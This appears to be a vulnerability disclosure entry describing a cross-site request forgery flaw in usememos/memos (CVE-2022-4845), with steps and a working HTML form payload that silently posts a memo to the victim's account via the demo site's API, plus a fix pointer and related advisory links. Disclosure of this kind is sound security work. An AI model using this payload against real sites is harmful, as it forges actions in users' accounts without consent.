Lucene search
Samirwaleed075DBD51-B078-436C-9E3D-7F25CD2E7E1BHistoryDec 28, 2022 - 9:57 p.m.
Add any thoughts via CSRF
2022-12-2821:57:24
samirwaleed
www.huntr.dev
7
csrf
data manipulation
security vulnerability
proof of concept
csrf token
0.001 Low
EPSS
Percentile
29.1%
Description
An attacker can add any user thoughts via a CSRF attack
When you send a link to the victim and click on it, any thoughts will be added
Proof of Concept
1- When the attacker adds any thoughts, it then intercepts the request
2- Take this request to generate a CSRF PoC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.usememos.com/api/memo" method="POST" enctype="text/plain">
<input type="hidden" name="{"content":"Test CSRF","visibility":"PRIVATE","resourceIdList":[]}" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
POC
https://drive.google.com/file/d/11Hec1H-61UpoOLVi55uWRpLBUMLVjRbi/view?usp=share_link
Some sources fix CSRF
Add CSRF Token
https://www.freecodecamp.org/news/csrf-protection-problem-and-how-to-fix-it
Related
cve
cve
CVE-2022-4845
2022-12-29 18:15:10
prion
prion
Cross site request forgery (csrf)
2022-12-29 18:15:00
nvd
nvd
CVE-2022-4845
2022-12-29 18:15:10
osv
osv
CVE-2022-4845
2022-12-29 18:15:10
usememos/memos Cross-Site Request Forgery vulnerability
2022-12-29 18:30:24
github
github
usememos/memos Cross-Site Request Forgery vulnerability
2022-12-29 18:30:24
veracode
veracode
Cross-Site Request Forgery (CSRF)
2023-01-03 07:26:32
cvelist
cvelist
CVE-2022-4845 Cross-Site Request Forgery (CSRF) in usememos/memos
2022-12-29 00:00:00